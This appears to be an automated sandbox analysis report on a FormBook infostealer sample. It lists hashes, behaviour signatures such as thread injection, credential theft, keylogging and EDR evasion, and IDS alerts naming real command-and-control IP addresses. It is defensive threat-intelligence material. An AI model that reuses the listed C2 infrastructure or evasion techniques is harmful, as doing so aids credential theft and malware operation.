Windows Analysis Report
jpdy1E8K4A.exe

Overview

General Information

Sample name: jpdy1E8K4A.exe
renamed because original name is a hash value
Original sample name: 64cccb8039b0fa277f21e1dccbeec520d08d2606dac35912b147372c03e53f56.exe
Analysis ID: 1529045
MD5: 473df0a675ceaba5a7c27f100e7d7491
SHA1: a3f60109a59e91a0e6443367b42a0ee8fd3feae6
SHA256: 64cccb8039b0fa277f21e1dccbeec520d08d2606dac35912b147372c03e53f56
Tags: exeFormbookuser-adrian__luca
Infos:

Detection

FormBook
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected FormBook
AI detected suspicious sample
Found direct / indirect Syscall (likely to bypass EDR)
Machine Learning detection for sample
Maps a DLL or memory area into another process
Modifies the context of a thread in another process (thread injection)
Switches to a custom stack to bypass stack traces
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Mail credentials (via file / registry access)
Writes to foreign memory regions
Checks if the current process is being debugged
Contains functionality for execution timing, often used to detect debuggers
Contains functionality for read data from the clipboard
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to block mouse and keyboard input (often used to hinder debugging)
Contains functionality to call native functions
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to check if a window is minimized (may be used to check if an application is visible)
Contains functionality to communicate with device drivers
Contains functionality to dynamically determine API calls
Contains functionality to execute programs as a different user
Contains functionality to launch a process as a different user
Contains functionality to launch a program with higher privileges
Contains functionality to modify clipboard data
Contains functionality to open a port and listen for incoming connection (possibly a backdoor)
Contains functionality to read the PEB
Contains functionality to read the clipboard data
Contains functionality to retrieve information about pressed keystrokes
Contains functionality to shutdown / reboot the system
Contains functionality to simulate keystroke presses
Contains functionality to simulate mouse events
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found evasive API chain (date check)
Found inlined nop instructions (likely shell or obfuscated code)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
OS version to string mapping found (often used in BOTs)
PE file contains an invalid checksum
Potential key logger detected (key state polling based)
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Sigma detected: Uncommon Svchost Parent Process
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)
Yara signature match

Classification

AV Detection

barindex
Source: jpdy1E8K4A.exe ReversingLabs: Detection: 71%
Source: Yara match File source: 2.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 2.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000002.00000002.2356846252.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000005.00000002.3983803562.0000000003360000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000005.00000002.3981537741.0000000002D40000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000002.3984182354.00000000040E0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000005.00000002.3983690192.0000000003310000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000002.00000002.2361090040.0000000007C30000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000002.00000002.2357806281.0000000005B50000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000002.3991557809.0000000007130000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Submited Sample Integrated Neural Analysis Model: Matched 100.0% probability
Source: jpdy1E8K4A.exe Joe Sandbox ML: detected
Source: jpdy1E8K4A.exe Static PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
Source: Binary string: R:\JoeSecurity\trunk\src\windows\usermode\tools\FakeChrome\Release\Chrome.pdb source: URUrIrqwFu.exe, 00000003.00000000.2269264068.000000000049E000.00000002.00000001.01000000.00000004.sdmp
Source: Binary string: wntdll.pdbUGP source: jpdy1E8K4A.exe, 00000000.00000003.2138350351.00000000046A0000.00000004.00001000.00020000.00000000.sdmp, jpdy1E8K4A.exe, 00000000.00000003.2140523388.0000000004500000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2253165221.0000000003600000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2357316364.0000000003A00000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2357316364.0000000003B9E000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2254958069.0000000003800000.00000004.00000020.00020000.00000000.sdmp, netbtugc.exe, 00000005.00000002.3984325140.0000000003740000.00000040.00001000.00020000.00000000.sdmp, netbtugc.exe, 00000005.00000003.2359616832.000000000358E000.00000004.00000020.00020000.00000000.sdmp, netbtugc.exe, 00000005.00000003.2357155798.00000000033D4000.00000004.00000020.00020000.00000000.sdmp, netbtugc.exe, 00000005.00000002.3984325140.00000000038DE000.00000040.00001000.00020000.00000000.sdmp
Source: Binary string: wntdll.pdb source: jpdy1E8K4A.exe, 00000000.00000003.2138350351.00000000046A0000.00000004.00001000.00020000.00000000.sdmp, jpdy1E8K4A.exe, 00000000.00000003.2140523388.0000000004500000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, svchost.exe, 00000002.00000003.2253165221.0000000003600000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2357316364.0000000003A00000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2357316364.0000000003B9E000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2254958069.0000000003800000.00000004.00000020.00020000.00000000.sdmp, netbtugc.exe, netbtugc.exe, 00000005.00000002.3984325140.0000000003740000.00000040.00001000.00020000.00000000.sdmp, netbtugc.exe, 00000005.00000003.2359616832.000000000358E000.00000004.00000020.00020000.00000000.sdmp, netbtugc.exe, 00000005.00000003.2357155798.00000000033D4000.00000004.00000020.00020000.00000000.sdmp, netbtugc.exe, 00000005.00000002.3984325140.00000000038DE000.00000040.00001000.00020000.00000000.sdmp
Source: Binary string: netbtugc.pdb source: svchost.exe, 00000002.00000002.2357173939.0000000003400000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2325952923.000000000341A000.00000004.00000020.00020000.00000000.sdmp, URUrIrqwFu.exe, 00000003.00000003.2301762796.000000000076B000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: svchost.pdb source: URUrIrqwFu.exe, 00000003.00000002.3989981117.0000000004CFC000.00000004.80000000.00040000.00000000.sdmp, netbtugc.exe, 00000005.00000002.3982015331.000000000311E000.00000004.00000020.00020000.00000000.sdmp, netbtugc.exe, 00000005.00000002.3985399158.0000000003D6C000.00000004.10000000.00040000.00000000.sdmp, firefox.exe, 00000008.00000002.2758378598.000000001F2CC000.00000004.80000000.00040000.00000000.sdmp
Source: Binary string: svchost.pdbUGP source: URUrIrqwFu.exe, 00000003.00000002.3989981117.0000000004CFC000.00000004.80000000.00040000.00000000.sdmp, netbtugc.exe, 00000005.00000002.3982015331.000000000311E000.00000004.00000020.00020000.00000000.sdmp, netbtugc.exe, 00000005.00000002.3985399158.0000000003D6C000.00000004.10000000.00040000.00000000.sdmp, firefox.exe, 00000008.00000002.2758378598.000000001F2CC000.00000004.80000000.00040000.00000000.sdmp
Source: Binary string: netbtugc.pdbGCTL source: svchost.exe, 00000002.00000002.2357173939.0000000003400000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2325952923.000000000341A000.00000004.00000020.00020000.00000000.sdmp, URUrIrqwFu.exe, 00000003.00000003.2301762796.000000000076B000.00000004.00000020.00020000.00000000.sdmp
Source: C:\Users\user\Desktop\jpdy1E8K4A.exe Code function: 0_2_00452492 FindFirstFileW,Sleep,FindNextFileW,FindClose, 0_2_00452492
Source: C:\Users\user\Desktop\jpdy1E8K4A.exe Code function: 0_2_00442886 FindFirstFileW,FindFirstFileW,FindNextFileW,FindClose,FindClose,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose, 0_2_00442886
Source: C:\Users\user\Desktop\jpdy1E8K4A.exe Code function: 0_2_004788BD FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf, 0_2_004788BD
Source: C:\Users\user\Desktop\jpdy1E8K4A.exe Code function: 0_2_004339B6 GetFileAttributesW,FindFirstFileW,FindClose, 0_2_004339B6
Source: C:\Users\user\Desktop\jpdy1E8K4A.exe Code function: 0_2_0045CAFA FindFirstFileW,FindNextFileW,FindClose, 0_2_0045CAFA
Source: C:\Users\user\Desktop\jpdy1E8K4A.exe Code function: 0_2_00431A86 FindFirstFileW,FindFirstFileW,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindClose,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose, 0_2_00431A86
Source: C:\Users\user\Desktop\jpdy1E8K4A.exe Code function: 0_2_0044BD27 _wcscat,_wcscat,__wsplitpath,FindFirstFileW,CopyFileW,_wcscpy,_wcscat,_wcscat,lstrcmpiW,DeleteFileW,MoveFileW,CopyFileW,DeleteFileW,CopyFileW,FindClose,MoveFileW,FindNextFileW,FindClose, 0_2_0044BD27
Source: C:\Users\user\Desktop\jpdy1E8K4A.exe Code function: 0_2_0045DE8F FindFirstFileW,FindClose, 0_2_0045DE8F
Source: C:\Users\user\Desktop\jpdy1E8K4A.exe Code function: 0_2_0044BF8B _wcscat,__wsplitpath,FindFirstFileW,_wcscpy,_wcscat,_wcscat,DeleteFileW,FindNextFileW,FindClose,FindClose, 0_2_0044BF8B
Source: C:\Windows\SysWOW64\netbtugc.exe Code function: 5_2_02D5C2C0 FindFirstFileW,FindNextFileW,FindClose, 5_2_02D5C2C0
Source: C:\Program Files (x86)\kKbTGrEVxHOXFZankeIgaOwhwKlfruYCEaqJfeLAGMkBWtzeWzCkqcexRbilms\URUrIrqwFu.exe Code function: 4x nop then xor eax, eax 3_2_0714EF2F
Source: C:\Program Files (x86)\kKbTGrEVxHOXFZankeIgaOwhwKlfruYCEaqJfeLAGMkBWtzeWzCkqcexRbilms\URUrIrqwFu.exe Code function: 4x nop then pop edi 3_2_0714A773
Source: C:\Program Files (x86)\kKbTGrEVxHOXFZankeIgaOwhwKlfruYCEaqJfeLAGMkBWtzeWzCkqcexRbilms\URUrIrqwFu.exe Code function: 4x nop then pop edi 3_2_0714A7AC
Source: C:\Program Files (x86)\kKbTGrEVxHOXFZankeIgaOwhwKlfruYCEaqJfeLAGMkBWtzeWzCkqcexRbilms\URUrIrqwFu.exe Code function: 4x nop then pop edi 3_2_0714BA75
Source: C:\Windows\SysWOW64\netbtugc.exe Code function: 4x nop then xor eax, eax 5_2_02D49B90
Source: C:\Windows\SysWOW64\netbtugc.exe Code function: 4x nop then pop edi 5_2_02D62399
Source: C:\Windows\SysWOW64\netbtugc.exe Code function: 4x nop then mov ebx, 00000004h 5_2_035804DE

Networking

barindex
Source: Network traffic Suricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.6:49932 -> 148.72.152.174:80
Source: Network traffic Suricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.6:49932 -> 148.72.152.174:80
Source: Network traffic Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.6:49995 -> 172.96.191.39:80
Source: Network traffic Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.6:49985 -> 3.33.130.190:80
Source: Network traffic Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.6:50004 -> 63.250.47.40:80
Source: Network traffic Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.6:49999 -> 217.70.184.50:80
Source: Network traffic Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.6:50008 -> 91.184.0.200:80
Source: Network traffic Suricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.6:50003 -> 217.70.184.50:80
Source: Network traffic Suricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.6:49994 -> 172.191.244.62:80
Source: Network traffic Suricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.6:50003 -> 217.70.184.50:80
Source: Network traffic Suricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.6:49994 -> 172.191.244.62:80
Source: Network traffic Suricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.6:50024 -> 43.242.202.169:80
Source: Network traffic Suricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.6:50024 -> 43.242.202.169:80
Source: Network traffic Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.6:50031 -> 85.159.66.93:80
Source: Network traffic Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.6:49986 -> 3.33.130.190:80
Source: Network traffic Suricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.6:50011 -> 91.184.0.200:80
Source: Network traffic Suricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.6:50011 -> 91.184.0.200:80
Source: Network traffic Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.6:50013 -> 13.248.169.48:80
Source: Network traffic Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.6:50009 -> 91.184.0.200:80
Source: Network traffic Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.6:50026 -> 103.224.182.242:80
Source: Network traffic Suricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.6:50015 -> 13.248.169.48:80
Source: Network traffic Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.6:49987 -> 3.33.130.190:80
Source: Network traffic Suricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.6:50007 -> 63.250.47.40:80
Source: Network traffic Suricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.6:50007 -> 63.250.47.40:80
Source: Network traffic Suricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.6:50015 -> 13.248.169.48:80
Source: Network traffic Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.6:49993 -> 172.191.244.62:80
Source: Network traffic Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.6:50014 -> 13.248.169.48:80
Source: Network traffic Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.6:49990 -> 172.191.244.62:80
Source: Network traffic Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.6:50005 -> 63.250.47.40:80
Source: Network traffic Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.6:50021 -> 43.242.202.169:80
Source: Network traffic Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.6:50010 -> 91.184.0.200:80
Source: Network traffic Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.6:50027 -> 103.224.182.242:80
Source: Network traffic Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.6:49992 -> 172.191.244.62:80
Source: Network traffic Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.6:50006 -> 63.250.47.40:80
Source: Network traffic Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.6:50001 -> 217.70.184.50:80
Source: Network traffic Suricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.6:49988 -> 3.33.130.190:80
Source: Network traffic Suricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.6:49988 -> 3.33.130.190:80
Source: Network traffic Suricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.6:50028 -> 103.224.182.242:80
Source: Network traffic Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.6:50030 -> 85.159.66.93:80
Source: Network traffic Suricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.6:49998 -> 172.96.191.39:80
Source: Network traffic Suricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.6:49998 -> 172.96.191.39:80
Source: Network traffic Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.6:50025 -> 103.224.182.242:80
Source: Network traffic Suricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.6:50028 -> 103.224.182.242:80
Source: Network traffic Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.6:50012 -> 13.248.169.48:80
Source: Network traffic Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.6:50002 -> 217.70.184.50:80
Source: Network traffic Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.6:50023 -> 43.242.202.169:80
Source: Network traffic Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.6:49996 -> 172.96.191.39:80
Source: Network traffic Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.6:50029 -> 85.159.66.93:80
Source: Network traffic Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.6:49997 -> 172.96.191.39:80
Source: Network traffic Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.6:50022 -> 43.242.202.169:80
Source: Network traffic Suricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.6:50032 -> 85.159.66.93:80
Source: Network traffic Suricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.6:50032 -> 85.159.66.93:80
Source: Joe Sandbox View IP Address: 172.191.244.62 172.191.244.62
Source: Joe Sandbox View IP Address: 63.250.47.40 63.250.47.40
Source: Joe Sandbox View IP Address: 13.248.169.48 13.248.169.48
Source: Joe Sandbox View ASN Name: ATT-INTERNET4US ATT-INTERNET4US
Source: Joe Sandbox View ASN Name: NAMECHEAP-NETUS NAMECHEAP-NETUS
Source: Joe Sandbox View ASN Name: AMAZON-02US AMAZON-02US
Source: Joe Sandbox View ASN Name: HOSTNETNL HOSTNETNL
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: C:\Users\user\Desktop\jpdy1E8K4A.exe Code function: 0_2_004422FE InternetQueryDataAvailable,InternetReadFile, 0_2_004422FE
Source: global traffic HTTP traffic detected: HTTP/1.1 200 OKdate: Tue, 08 Oct 2024 13:55:40 GMTserver: Apacheset-cookie: __tad=1728395740.6411101; expires=Fri, 06-Oct-2034 13:55:40 GMT; Max-Age=315360000vary: Accept-Encodingcontent-encoding: gzipcontent-length: 581content-type: text/html; charset=UTF-8connection: closeData Raw: 1f 8b 08 00 00 00 00 00 00 03 8d 54 c1 6e db 30 0c 3d c7 5f 41 b8 07 3b e8 6a a5 c8 d6 01 89 ed 1d 06 0c d8 b0 c3 d0 6e e7 41 91 e9 58 ad 2d 79 12 93 34 28 f2 ef a5 1c 37 ed ba c3 aa 8b 2d ea 3d f2 3d 9a 72 de 50 d7 96 51 de a0 ac f8 41 9a 5a 2c 8d 5d 49 47 db ab 6c 87 2b af 09 73 71 8c 47 b9 57 4e f7 04 b4 ef b1 88 09 ef 49 dc ca ad 3c 46 63 f0 4e 15 b1 b8 f5 a2 d6 66 8d ae 77 da 90 d0 ba c6 ac d3 26 bb f5 71 99 8b 23 f6 7f a9 ca 68 2b 1d 38 ac b4 43 45 bf 5b 6d ee a0 80 a4 21 ea 17 42 ec 76 bb ec b5 46 d1 f7 ef e7 e2 53 b2 8c 22 21 e0 06 09 24 90 ee d0 6e 08 6c 0d f3 d9 0c 3a ad 9c f5 a8 ac a9 3c 90 05 bc 47 b5 21 64 e0 53 21 d0 35 50 83 f0 42 3f f4 ce 76 da 73 4c ea d6 43 6d 1d 78 db 21 53 a4 b7 26 aa 37 46 91 b6 86 8f db 76 25 d5 dd f5 98 2a 9d c2 43 34 d9 69 53 d9 5d d6 5a 25 03 2a 73 d8 b7 52 61 fa 97 b3 f3 a4 ee 8b 8b 8f c9 74 19 1d a2 88 dc 3e 30 59 a5 27 70 95 fb 39 9a 28 c0 23 8d 9b f4 75 b5 77 c1 20 f3 27 a1 6d 75 ff 63 d4 5c c0 97 67 27 df 6e 58 87 ac d2 87 ce 1a 4d 96 43 eb 45 90 ed f1 10 98 27 56 34 99 64 dc 04 93 d6 3d 14 25 67 cb d6 c8 76 a6 a7 38 bf 4c 1c fa 4d 4b e1 fc 01 c2 7e 2c ec 82 ce 60 27 39 3f 22 b2 ad f6 a1 d8 d7 6a 39 c0 54 8b f2 c9 52 fa ec 6e 7a 3c 7d 5b bb 42 99 81 10 74 1f 80 b1 aa 49 d1 b9 a1 e3 ff 7e 87 a1 ab 2f 07 8f f6 3c cb b0 b2 15 37 1a 02 76 ed ec c6 54 8b b3 cb d9 a5 9a 5f c1 01 18 3d 80 98 36 5e 8c 01 bd 5a 2b db 5a 57 c4 67 f5 b0 62 08 73 cb db d9 b0 78 6a f3 4a 6f 61 e0 16 49 a5 3d ab df 2f c0 58 83 cb a4 cc 25 34 0e eb e2 0d 53 1c e6 61 9e 94 9f 5b ad ee a0 41 87 c3 b8 1a 42 97 0b c9 97 88 ab 70 2d 63 47 4f 79 87 c4 c9 39 ed 05 fe d9 e8 6d 11 73 1d ee 7f 13 03 8f 11 31 b1 88 67 4b f8 75 fd bd 78 5b ed 0f e1 a6 9e d2 73 17 82 fd a1 1b e1 6f f1 08 0f 59 bd ae 34 04 00 00 Data Ascii: Tn0=_A;jnAX-y4(7-==rPQAZ,]IGl+sqGWNI<FcNfw&q#h+8CE[m!BvFS"!$nl:<G!dS!5PB?vsLCmx!S&7Fv%*C4iS]Z%*sRat>0Y'p9(#uw 'muc\g'nXMCE'V4d=%gv8LMK~,`'9?"j9TRnz<}[BtI~/<7vT_=6^Z+ZWgbsxjJoaI=/X%4Sa[ABp-cGOy9ms1gKux[soY4
Source: global traffic HTTP traffic detected: HTTP/1.1 200 OKdate: Tue, 08 Oct 2024 13:55:44 GMTserver: Apacheset-cookie: __tad=1728395744.6678593; expires=Fri, 06-Oct-2034 13:55:44 GMT; Max-Age=315360000vary: Accept-Encodingcontent-encoding: gzipcontent-length: 581content-type: text/html; charset=UTF-8connection: closeData Raw: 1f 8b 08 00 00 00 00 00 00 03 8d 54 c1 6e db 30 0c 3d c7 5f 41 b8 07 3b e8 6a a5 c8 d6 01 89 ed 1d 06 0c d8 b0 c3 d0 6e e7 41 91 e9 58 ad 2d 79 12 93 34 28 f2 ef a5 1c 37 ed ba c3 aa 8b 2d ea 3d f2 3d 9a 72 de 50 d7 96 51 de a0 ac f8 41 9a 5a 2c 8d 5d 49 47 db ab 6c 87 2b af 09 73 71 8c 47 b9 57 4e f7 04 b4 ef b1 88 09 ef 49 dc ca ad 3c 46 63 f0 4e 15 b1 b8 f5 a2 d6 66 8d ae 77 da 90 d0 ba c6 ac d3 26 bb f5 71 99 8b 23 f6 7f a9 ca 68 2b 1d 38 ac b4 43 45 bf 5b 6d ee a0 80 a4 21 ea 17 42 ec 76 bb ec b5 46 d1 f7 ef e7 e2 53 b2 8c 22 21 e0 06 09 24 90 ee d0 6e 08 6c 0d f3 d9 0c 3a ad 9c f5 a8 ac a9 3c 90 05 bc 47 b5 21 64 e0 53 21 d0 35 50 83 f0 42 3f f4 ce 76 da 73 4c ea d6 43 6d 1d 78 db 21 53 a4 b7 26 aa 37 46 91 b6 86 8f db 76 25 d5 dd f5 98 2a 9d c2 43 34 d9 69 53 d9 5d d6 5a 25 03 2a 73 d8 b7 52 61 fa 97 b3 f3 a4 ee 8b 8b 8f c9 74 19 1d a2 88 dc 3e 30 59 a5 27 70 95 fb 39 9a 28 c0 23 8d 9b f4 75 b5 77 c1 20 f3 27 a1 6d 75 ff 63 d4 5c c0 97 67 27 df 6e 58 87 ac d2 87 ce 1a 4d 96 43 eb 45 90 ed f1 10 98 27 56 34 99 64 dc 04 93 d6 3d 14 25 67 cb d6 c8 76 a6 a7 38 bf 4c 1c fa 4d 4b e1 fc 01 c2 7e 2c ec 82 ce 60 27 39 3f 22 b2 ad f6 a1 d8 d7 6a 39 c0 54 8b f2 c9 52 fa ec 6e 7a 3c 7d 5b bb 42 99 81 10 74 1f 80 b1 aa 49 d1 b9 a1 e3 ff 7e 87 a1 ab 2f 07 8f f6 3c cb b0 b2 15 37 1a 02 76 ed ec c6 54 8b b3 cb d9 a5 9a 5f c1 01 18 3d 80 98 36 5e 8c 01 bd 5a 2b db 5a 57 c4 67 f5 b0 62 08 73 cb db d9 b0 78 6a f3 4a 6f 61 e0 16 49 a5 3d ab df 2f c0 58 83 cb a4 cc 25 34 0e eb e2 0d 53 1c e6 61 9e 94 9f 5b ad ee a0 41 87 c3 b8 1a 42 97 0b c9 97 88 ab 70 2d 63 47 4f 79 87 c4 c9 39 ed 05 fe d9 e8 6d 11 73 1d ee 7f 13 03 8f 11 31 b1 88 67 4b f8 75 fd bd 78 5b ed 0f e1 a6 9e d2 73 17 82 fd a1 1b e1 6f f1 08 0f 59 bd ae 34 04 00 00 Data Ascii: Tn0=_A;jnAX-y4(7-==rPQAZ,]IGl+sqGWNI<FcNfw&q#h+8CE[m!BvFS"!$nl:<G!dS!5PB?vsLCmx!S&7Fv%*C4iS]Z%*sRat>0Y'p9(#uw 'muc\g'nXMCE'V4d=%gv8LMK~,`'9?"j9TRnz<}[BtI~/<7vT_=6^Z+ZWgbsxjJoaI=/X%4Sa[ABp-cGOy9ms1gKux[soY4
